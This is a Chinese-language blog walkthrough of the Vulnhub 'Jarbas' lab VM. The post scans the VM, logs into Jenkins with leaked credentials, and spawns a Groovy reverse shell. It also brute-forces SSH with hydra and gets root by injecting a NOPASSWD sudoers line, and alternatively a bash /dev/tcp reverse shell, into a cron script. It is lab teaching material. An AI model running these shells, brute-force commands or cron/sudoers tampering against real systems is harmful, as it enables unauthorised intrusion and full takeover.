Vulnhub Jarbas
0x01:端口扫描
主机发现
nmap -sn 192.168.231.0/24
全端口详细扫描
nmap -sT -sC -sV -O -p- 192.168.231.134 -oA /root/scan
发现有3个服务,22ssh,80http,3306mysql,8080http
接下来对http进行漏洞扫描
nmap --script=vuln -p80 192.168.231.134
似乎有csrf和sql注入漏洞
0x02:web渗透
扫目录
dirsearch -u http://192.168.231.134
dirsearch -u http://192.168.231.134:8080
扫到一个access.html,我们访问一下
tiago:italia99
trindade:marianna
eder:vipsu
我们试试ssh
行不通,还记得我们之前扫到了8080的http吗,他是一个登录框,用的是Jenkins,我们尝试登陆一下
最后一个登陆进去了
我们一个一个地看,看到了Build Executor Status
发现他有一台叫做master的linux机器,我们点进去看看
说的是允许我们执行一些Groovy脚本语法
用户名是jenkins,我们hydra爆破一下
hydra -l jenkins -P /usr/share/wordlists/rockyou.txt 192.168.231.134 -t 20 ssh -Vv
-l:用户名
-P:字典路径
-t:线程数
-Vv:输出详情信息
发现爆不出来,我们尝试另一种方法
我们尝试使用这个终端反弹一个shell,直接google搜就行了https://blog.csdn.net/weixin_54227009/article/details/130805973,用这个cli插件反弹
String host="192.168.231.131";
int port=6666;
String cmd="/bin/bash";
//ProcessBuilder创建操作系统进程
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed())
{while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());
while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try
{p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
0x03:权限提升
首先创建一个好看点的bash
python -c 'import pty ;pty.spawn("/bin/bash");'
先看常规sudo提权
sudo -l
看看suid
find / -type f -perm -04000 -ls 2>/dev/null
-ls:以列表形式显示找到的文件的详细信息,包括权限、大小、修改时间等。
基本上没有啥可以利用的
再看看作业表
cat /etc/crontab
拿到可以利用的文件了,这里有一个作业表,我们尝试利用它提升权限
echo "echo 'jenkins ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers" >> /etc/script/CleaningScript.sh
sudo /bin/bash
这个需要稍等以下,等他CronJob执行后才能运行
拿到root权限,我们find查找flag
find / -type f -name "flag.txt" 2>/dev/null
0x04:思考补足
看了师傅的wp后发现可以做出以下改动
1.刚开始端口扫描没有扫到8080端口,导致思路受限,以后一定要多扫几遍
2.web渗透呢,有些师傅用的是MSF,我这里也试了一下
用第一个
把options配好,然后运行
但是呢报错了
按照他的提示改好就行了
还有就是在jenkins创建新文件(写马),或者是修改文件
3.提权的话,可以在配置文件中修改来反弹shell提权
bash-4.2$ echo "/bin/bash -c 'bash -i >& /dev/tcp/192.168.231.131/8888 0>&1'" > /etc/script/CleaningScript.sh
标签:bin,etc,192.168,231.134,Jarbas,while,Vulnhub,bash
From: https://www.cnblogs.com/kelec0ka/p/18544514